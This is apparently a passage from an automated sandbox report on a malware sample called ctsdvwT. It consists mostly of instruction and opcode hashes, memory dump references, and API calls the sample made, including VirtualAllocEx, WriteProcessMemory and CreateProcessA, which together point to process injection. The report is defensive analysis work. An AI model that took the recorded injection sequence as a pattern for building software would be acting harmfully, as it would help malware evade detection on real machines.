                                        • Instruction ID: 857695aff36d71e47f2785374d9f5c007793cc81abd74e3c86ecb8d3e546dc56
                                        • Opcode Fuzzy Hash: a46a7c8f0211332dc4f16b8ff13f20ec5f9e2d502a0df02fcd0398a7883ff42f
                                        • Instruction Fuzzy Hash: 692166386001015FDF16EB2CFAD4B5A379AEB49308F114922D00DC76AADB78DD458B91
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.2230692793.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_11b0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 79a221786ddba4396f97a0fd72b2d573e5565c786a5e5b144fa55bb4f5c805c6
                                        • Instruction ID: 2d201f17f0f133f5807b484e0bc908613639071a66d9176966586f17c342e54d
                                        • Opcode Fuzzy Hash: 79a221786ddba4396f97a0fd72b2d573e5565c786a5e5b144fa55bb4f5c805c6
                                        • Instruction Fuzzy Hash: D511B430E053404FDF2A5A7899903AF3BB5EB4A214F15496BE046CF2A3DB19CA458BD1
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.2230692793.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_11b0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 412a33b898e9d6cedc9a1809242b84ec48b8826680a6f9cfa3fc3dad658bdee0
                                        • Instruction ID: d9d2de6ed3bd85cef86d966046445ff19e2fa21d956f141f95cc364100498396
                                        • Opcode Fuzzy Hash: 412a33b898e9d6cedc9a1809242b84ec48b8826680a6f9cfa3fc3dad658bdee0
                                        • Instruction Fuzzy Hash: EC212C34700209DFDB58DB78D698AAE77F2AF4D204F2004A8E406EB361DB729D00CB91
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.2230692793.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_11b0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e8e108b5e3a65a4680e7a39d745bbb180e16478a549718e5a610cbbe8746a4b6
                                        • Instruction ID: 6c980b1adf27a406805151c15b1d9027fee5073b682709d1d1d21ebd67bb49a4
                                        • Opcode Fuzzy Hash: e8e108b5e3a65a4680e7a39d745bbb180e16478a549718e5a610cbbe8746a4b6
                                        • Instruction Fuzzy Hash: B5118230F002044BEF695A7DD5947AF76A5EB4D254F104979F00ACF262DB65CE858BC1
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.2230395368.0000000000F5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F5D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_f5d000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 53864572b7c61133590019717d56551bd8b4971df2f0885abe01d75578af1056
                                        • Instruction ID: 95f8faeeb420eb55686aec3206f8cef259fe31dfa18ec9fe40ae68f67f0a85fa
                                        • Opcode Fuzzy Hash: 53864572b7c61133590019717d56551bd8b4971df2f0885abe01d75578af1056
                                        • Instruction Fuzzy Hash: C9219F755093C08FDB12CF24D994715BF71EB46324F28C5EAD9498F2A7C33A980ADB62
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.2230692793.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_11b0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5e72cefbb8a459cc20ea06e777071a8a0b201db881b92ead4548008bc32cbca6
                                        • Instruction ID: 83b8ce73c94257821e59bf1124d19933ac00651e5187fc2bd18ff2d910fe7904
                                        • Opcode Fuzzy Hash: 5e72cefbb8a459cc20ea06e777071a8a0b201db881b92ead4548008bc32cbca6
                                        • Instruction Fuzzy Hash: BB018031B003159FCB29EFB894901EE7BF5EF49210B160479E80AE7241E735D8428BA2
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.2230692793.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_11b0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b86e3f39798debff2212794f11eb71cb4456ae10606d167359d081804341320f
                                        • Instruction ID: b6cfc42a904abbac74a29ab72c51241e4ad62dbcf3d22dc8bdcde5de887dfc03
                                        • Opcode Fuzzy Hash: b86e3f39798debff2212794f11eb71cb4456ae10606d167359d081804341320f
                                        • Instruction Fuzzy Hash: C701B930A101088FDB04EF59E98478ABB75FF84314F548174D9085B29AD774E946C791
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.2230692793.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_11b0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2fdcf8473acdaef71b75f5003f3222fb8dd8ee3040317bf267f587b3ce45ba45
                                        • Instruction ID: 9c854c758bb7f7d5ba87ea6b4980d05e76a52a5ca233c5540a95f5291a19f451
                                        • Opcode Fuzzy Hash: 2fdcf8473acdaef71b75f5003f3222fb8dd8ee3040317bf267f587b3ce45ba45
                                        • Instruction Fuzzy Hash: F6012130940249AFCB16EFB4FF8598D7FB6EF45308F5046AAC0089B255DA355E09CB91
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.2230692793.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_11b0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ee0acc3f71a8a0f34450aad0a8d8c2856c53e4e934578b0d20017bacf4a36789
                                        • Instruction ID: 2a1967f525503f8aed191a6e1a6aa6b303161c6a4bdccd28580bfbb0ebad527e
                                        • Opcode Fuzzy Hash: ee0acc3f71a8a0f34450aad0a8d8c2856c53e4e934578b0d20017bacf4a36789
                                        • Instruction Fuzzy Hash: 78F02B73A04150DBD72A8BB8A8E01EC7F71EE6A11171F00D7D406DB252D325D402CB52
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.2230692793.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_11b0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 217b3f89d5240881f4962aeb72e1a341bd82829fba3680d72d877b93157b4b5d
                                        • Instruction ID: b8969d8eeb6f1e3ec9e800938a8b24bed0754f5020a9c25196c988a2a48442bd
                                        • Opcode Fuzzy Hash: 217b3f89d5240881f4962aeb72e1a341bd82829fba3680d72d877b93157b4b5d
                                        • Instruction Fuzzy Hash: 7BF03130940109EFCB0AFFB8FB8599D7BB9EF44308F504679C5089B259DB316E098B91

                                        Execution Graph

                                        Execution Coverage:11.5%
                                        Dynamic/Decrypted Code Coverage:100%
                                        Signature Coverage:0%
                                        Total number of Nodes:341
                                        Total number of Limit Nodes:25

                                        Control-flow Graph

                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: !Y3E$Te]q$Te]q$$]q$$]q$$]q$$]q
                                        • API String ID: 0-1582036792
                                        • Opcode ID: 14557b8a223ab91c13bc29e4cf6f8d0b7c15288c5f26477d12ea7a6772b72576
                                        • Instruction ID: 63e2b1bb3ee145fdf35b3e43f65c6ba1a3a9fa79333be6f370ac68e3e7c9547d
                                        • Opcode Fuzzy Hash: 14557b8a223ab91c13bc29e4cf6f8d0b7c15288c5f26477d12ea7a6772b72576
                                        • Instruction Fuzzy Hash: 1DA18C74B502499FDB089F69C995B6E7AF3BF88700F25846AE806DB3A4DE74DC01CB41

                                        Control-flow Graph

                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: Te]q$Te]q$$]q$$]q
                                        • API String ID: 0-3083981010
                                        • Opcode ID: 447d1debd7c95f7252baba12e211ea763bf2940f55149ffea537e2c73339b9dd
                                        • Instruction ID: c76b9365e673abee660c8e11b33d759be347a96c9375c14e410f9dcde63d2056
                                        • Opcode Fuzzy Hash: 447d1debd7c95f7252baba12e211ea763bf2940f55149ffea537e2c73339b9dd
                                        • Instruction Fuzzy Hash: 63A19C74B502499FDB089F79C995B6E7AF2BF88700F25846AE806DB3A4DE74DC01CB41

                                        Control-flow Graph

                                        APIs
                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 01831BE6
                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 01831CC8
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2249331157.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_1830000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: AllocMemoryProcessVirtualWrite
                                        • String ID:
                                        • API String ID: 645232735-0
                                        • Opcode ID: 6971b823cf2ee294913d01e5daada33d17c1682a621a5858b30e1ad314f8dc8f
                                        • Instruction ID: d2c786ecd1b13940c88f45110b19ce963fd24885df17d9b9d2e3f8a1ab44aa01
                                        • Opcode Fuzzy Hash: 6971b823cf2ee294913d01e5daada33d17c1682a621a5858b30e1ad314f8dc8f
                                        • Instruction Fuzzy Hash: 694188B29002098FDF14DFA9C844BEEBFF1FF88310F148429E619A7250D7799955CBA0

                                        Control-flow Graph

                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $]q$$]q
                                        • API String ID: 0-127220927
                                        • Opcode ID: 09621aaee9fb22fe6266f23eaae56e63d8e291037058bd336f943ff12b19e6c6
                                        • Instruction ID: 414d600f5a39651a9a8d16b489c3857d93de37e75495100c0c0465e5a29904e9
                                        • Opcode Fuzzy Hash: 09621aaee9fb22fe6266f23eaae56e63d8e291037058bd336f943ff12b19e6c6
                                        • Instruction Fuzzy Hash: 6D519F74B402099FDB189F75D955BAE7AB3BF88700F24846AE8069B394CE75DC01CB51

                                        Control-flow Graph

                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: Haq$T(z
                                        • API String ID: 0-1589312872
                                        • Opcode ID: f2a6fbd1dfb9b449db3342e8dc77cf36f19956b1e01f18a655185221549d0cfc
                                        • Instruction ID: d8c2c6ec38e793094900dad6288ce63043019ae27dab886e823fca83dc9bf3d6
                                        • Opcode Fuzzy Hash: f2a6fbd1dfb9b449db3342e8dc77cf36f19956b1e01f18a655185221549d0cfc
                                        • Instruction Fuzzy Hash: 9A411971F25205CBDB08DFB489556AE7BB6FBC5640F18886BD502AF294CA30CD46C751
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: T(z
                                        • API String ID: 0-3184255237
                                        • Opcode ID: ffa601e0789a1e63c81a56162817c2685a50382b1c4a012bf6702c531fd8652c
                                        • Instruction ID: 2ce936f03c00b48d0b04f3cbef864c054ee40434be49e8564db1d2442a6323b9
                                        • Opcode Fuzzy Hash: ffa601e0789a1e63c81a56162817c2685a50382b1c4a012bf6702c531fd8652c
                                        • Instruction Fuzzy Hash: A7411872F24205CBDB088FB589556AFB6B7FBC9640F18842BD502BF294CA30C942C751
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: T(z
                                        • API String ID: 0-3184255237
                                        • Opcode ID: 1811641ac44d577f53fd451d0a855fb6d722fba83383047291c7df94531b1ec8
                                        • Instruction ID: f5739f3e6cdfd71d662669a4642da2e37d2d11c90af6f31f4889571a40efb068
                                        • Opcode Fuzzy Hash: 1811641ac44d577f53fd451d0a855fb6d722fba83383047291c7df94531b1ec8
                                        • Instruction Fuzzy Hash: 23312B72F24205CBDB088FB589555AFB6B7FBC9640F18842BD502BF294CA30CD42C751
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: T(z
                                        • API String ID: 0-3184255237
                                        • Opcode ID: 5b23ad30731a40d1bee0240eaf90623c5e7ccd661ea995bee680e47127acad6a
                                        • Instruction ID: 2032155769a718b0f918e8d347b538d4ad2101ba471849ae2ae3a920b4115c36
                                        • Opcode Fuzzy Hash: 5b23ad30731a40d1bee0240eaf90623c5e7ccd661ea995bee680e47127acad6a
                                        • Instruction Fuzzy Hash: 5531E7B2F35205CBDB449FB489556AEB6B7FBC9640F188427D513AF294CA30CD42CB52
                                        • Instruction ID: 7b8b9713fe4ddf5d9aa158a1a421c9247b256fad8b39699d6c508f141a28943c
                                        • Opcode Fuzzy Hash: e0e9d9b81cb685098b58f1cc0d14526c8facbc079e70b26e2bc5b80a44d4ba91
                                        • Instruction Fuzzy Hash: 70A126F221425ACFC7048F28C8926AABBF5FF82301B6A8857D805DF252DB31DD59CB51
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 43d991618795e480747b23de155d23da63857afa212e76099a0c07fe895ef1c5
                                        • Instruction ID: cc2dd9f7139fa3b9be9988a12ae3b189ded664b3d684076169b6f2b3e1a7eec5
                                        • Opcode Fuzzy Hash: 43d991618795e480747b23de155d23da63857afa212e76099a0c07fe895ef1c5
                                        • Instruction Fuzzy Hash: CBA106F221425ACFC7048F28C9926AABBF5FF82301B6A8857D845DF251DB30DD59CB51
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8f34a3bb823044dd48d40083a0116ad0191cb0caaef23d8a20544f36eb679620
                                        • Instruction ID: ad047b6bd6d40ef88d63d100ca62f5e9129c6d1b0e268891c55494f59bb43ff4
                                        • Opcode Fuzzy Hash: 8f34a3bb823044dd48d40083a0116ad0191cb0caaef23d8a20544f36eb679620
                                        • Instruction Fuzzy Hash: 12A126F221425ACFC704CF28C8926AABBF1FF82311B6A8857D841DF252DB30D959CB51
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 840005bf4fe26531f76cf8a85c2e23a63f2f41caa33131e6cc2e6c7fa4962fd3
                                        • Instruction ID: 99535a875c7af1e8d23c9147b1f02fe8d9ff9dc632c72cf8487a7f7486d981cc
                                        • Opcode Fuzzy Hash: 840005bf4fe26531f76cf8a85c2e23a63f2f41caa33131e6cc2e6c7fa4962fd3
                                        • Instruction Fuzzy Hash: D6A104F221425ACFC7048F28C8925AABBF1FF82311B6A885BD846DF251DB31DD59CB51
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 06256f9a60ff2f0f743de13591d2919f62edff0ca7bf67f6bda6848ca70a620a
                                        • Instruction ID: 20b63e76d26b39a7807fb11e7fd9a766b06c8c5aca392aa1f8428076f5529ccd
                                        • Opcode Fuzzy Hash: 06256f9a60ff2f0f743de13591d2919f62edff0ca7bf67f6bda6848ca70a620a
                                        • Instruction Fuzzy Hash: 74A106F221425ACFC7048F28C89266ABBF5FF82311B6A8857D845DF251DB30DD59CB91
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 965112a833d04ae1523c92ff703cd7a5ac0a0cc39cb50be720db3ffcf691ac45
                                        • Instruction ID: 5491016ed5e1fefd53e6151c7c2e0b21d979c2e9bb54361f238002fdbb246036
                                        • Opcode Fuzzy Hash: 965112a833d04ae1523c92ff703cd7a5ac0a0cc39cb50be720db3ffcf691ac45
                                        • Instruction Fuzzy Hash: DF61BFF222814DCFC704CF28C9914297BB6BBC6301B5A8467D806EF255D735ED49CB55
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9faec4ca8cb96a39625f21cca7289fa99421b4066a6b984d40de3dcbfd660400
                                        • Instruction ID: 37f0e2b68828f1b608519d539f209b087f22aceaca4a7aadf632da9cd5d922e1
                                        • Opcode Fuzzy Hash: 9faec4ca8cb96a39625f21cca7289fa99421b4066a6b984d40de3dcbfd660400
                                        • Instruction Fuzzy Hash: C341B672A24219DBC744EFA8C9419EEFBB6EF89210F18446BE515EB250C632DD41CBE1
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b7609a36f423b867a2a97c1dcd399f26ed527e768d1a5da7773e63c177e81f96
                                        • Instruction ID: 8124a28901c276771e03fa7a7afea329075f41fe997c34832a0e8487f9f30dde
                                        • Opcode Fuzzy Hash: b7609a36f423b867a2a97c1dcd399f26ed527e768d1a5da7773e63c177e81f96
                                        • Instruction Fuzzy Hash: AA419676A24219DBCB04EFA8CA408EEFBB6EF89310F244467E519EB250D631DD41CBD1
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 18590407f262d46aac3f2a5bc11e6460259d7f1014cf52dc0712df69315472cc
                                        • Instruction ID: 50144a8399c52befcc82c7f18de73588c5421598ecd7deab383c29e05d912727
                                        • Opcode Fuzzy Hash: 18590407f262d46aac3f2a5bc11e6460259d7f1014cf52dc0712df69315472cc
                                        • Instruction Fuzzy Hash: 5B3197B1D186188BDB18CFABD8453EEBEFBAF89300F18D02AD419A6254DB754546CF50

                                        Control-flow Graph 395, first node 14dd429-14dd4c7 (graph rendering not reproduced)
                                        APIs
                                        • GetCurrentProcess.KERNEL32 ref: 014DD4B6
                                        • GetCurrentThread.KERNEL32 ref: 014DD4F3
                                        • GetCurrentProcess.KERNEL32 ref: 014DD530
                                        • GetCurrentThreadId.KERNEL32 ref: 014DD589
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2248003028.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_14d0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: Current$ProcessThread
                                        • String ID:
                                        • API String ID: 2063062207-0
                                        • Opcode ID: 2245032155d93eddbb60cebc8c430598370d78c869171906da4ab2b3476c622f
                                        • Instruction ID: 890ea79d6a4eb614edef9fc41523ecf5f4c7128cc0113c0047ee01fb2aa8cea6
                                        • Opcode Fuzzy Hash: 2245032155d93eddbb60cebc8c430598370d78c869171906da4ab2b3476c622f
                                        • Instruction Fuzzy Hash: 415146B0900349DFDB18DFAAD548BAEBBF5EF48304F20845AD519A72A0D738A944CB65

                                        Control-flow Graph 418, first node 14dd438-14dd4c7 (graph rendering not reproduced)
                                        APIs
                                        • GetCurrentProcess.KERNEL32 ref: 014DD4B6
                                        • GetCurrentThread.KERNEL32 ref: 014DD4F3
                                        • GetCurrentProcess.KERNEL32 ref: 014DD530
                                        • GetCurrentThreadId.KERNEL32 ref: 014DD589
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2248003028.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_14d0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: Current$ProcessThread
                                        • String ID:
                                        • API String ID: 2063062207-0
                                        • Opcode ID: fee6c7e288c54bbe17ea76e204610d0c6f9f0cafd1fbef8d7c7a560f7509eef0
                                        • Instruction ID: 7db29dfb0aa09d40cdf4eaf65914e1e19e64ccf84e5de23f5daccc7cc07a65ea
                                        • Opcode Fuzzy Hash: fee6c7e288c54bbe17ea76e204610d0c6f9f0cafd1fbef8d7c7a560f7509eef0
                                        • Instruction Fuzzy Hash: AE5136B0900309CFDB58DFAAD548BAEBBF5EF48304F20845AD519B73A0D738A944CB65

                                        Control-flow Graph 769, first node 7f73f41-7f73f49 (graph rendering not reproduced)
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $]q$$]q
                                        • API String ID: 0-127220927
                                        • Opcode ID: 95b922345ae96a8743979431d061f5ab72913533841fb56bc88a4a4355789a1f
                                        • Instruction ID: 541de3788bbda2876bda5e975985a73580f63f39db18778f8fb184d56d79deeb
                                        • Opcode Fuzzy Hash: 95b922345ae96a8743979431d061f5ab72913533841fb56bc88a4a4355789a1f
                                        • Instruction Fuzzy Hash: 88516074B402049FDB089F75D965BAE7AF3BF88700F24846AE9069B3A4DE75DC01CB51

                                        Control-flow Graph 828, first node 7f73f7b (graph rendering not reproduced)
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2258247933.0000000007F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_7f70000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $]q$$]q
                                        • API String ID: 0-127220927
                                        • Opcode ID: 4ee9d0dea41d2983345ab4895cee8ae900aa34b83eeecdb006afe836e624eb47
                                        • Instruction ID: 77f17f6dbcb2d99f7ee4c34ab78a72e1bd194edfddaea8be94e4ac53e4f8e876
                                        • Opcode Fuzzy Hash: 4ee9d0dea41d2983345ab4895cee8ae900aa34b83eeecdb006afe836e624eb47
                                        • Instruction Fuzzy Hash: FA417F74B402049FDB089F75D965BAEBAB3BF88700F24846AE9069B3A4CE75DC01CB51
                                        APIs
                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 018320F6
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2249331157.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_1830000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: CreateProcess
                                        • String ID:
                                        • API String ID: 963392458-0
                                        • Opcode ID: 348333fd472aa3e69c429a251bcf6a66da394d2dbe3dee54b078803d565d59ad
                                        • Instruction ID: 0135ff5b6da948e5b94874b9c33337c67cf8c6182d4260cb7c7322237abab7c0
                                        • Opcode Fuzzy Hash: 348333fd472aa3e69c429a251bcf6a66da394d2dbe3dee54b078803d565d59ad
                                        • Instruction Fuzzy Hash: 27A16C71D00619DFEB24CF68C844BEDBBB2BF84314F1881A9E819E7250DB749A85CF91
                                        APIs
                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 018320F6
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2249331157.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_1830000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: CreateProcess
                                        • String ID:
                                        • API String ID: 963392458-0
                                        • Opcode ID: 72f4e597c08a6f04b554480d9f16a20089a276474af9af705b80f094ebab138b
                                        • Instruction ID: 0c24d26df5c3982c30dfc9d495a25038e2686281b4bb2378d4949a23cce9b171
                                        • Opcode Fuzzy Hash: 72f4e597c08a6f04b554480d9f16a20089a276474af9af705b80f094ebab138b
                                        • Instruction Fuzzy Hash: 56916B71D00619DFEB24CF68C844BEDBBB2BF84314F088169E819E7250DB749A85CF91
                                        APIs
                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 014DAFFE
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2248003028.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_14d0000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: HandleModule
                                        • String ID:
                                        • API String ID: 4139908857-0
                                        • Opcode ID: a0dd96ee38de6e8b22e3ca9d1641f32256006932682ee21fc39573bdcc9a411c
                                        • Instruction ID: 69708c58e105782101b65f3adb54d5964cc91d27707162055d6e6d03a4179746
                                        • Opcode Fuzzy Hash: a0dd96ee38de6e8b22e3ca9d1641f32256006932682ee21fc39573bdcc9a411c
                                        • Instruction Fuzzy Hash: 08814470A00B058FDB24DF2AD06479ABBF1FF89214F10896ED58A97B60D735E946CB90
                                        APIs
                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 03281A02
                                        Memory Dump Source
                                        • Source File: 0000000A.00000002.2250560868.0000000003280000.00000040.00000800.00020000.00000000.sdmp, Offset: 03280000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_10_2_3280000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: CreateWindow
                                        • String ID:
                                        • API String ID: 716092398-0
                                        • Opcode ID: 9d2b0f186d46ede40d1597498c31b7b324e9a0eb6c91f939547768553319bad1
                                        • Instruction ID: 7dc92e50f81f9cef00097c5cbe256f472712cb599e1af5cb8fad8fa747cb0a15
                                        • Opcode Fuzzy Hash: 9d2b0f186d46ede40d1597498c31b7b324e9a0eb6c91f939547768553319bad1
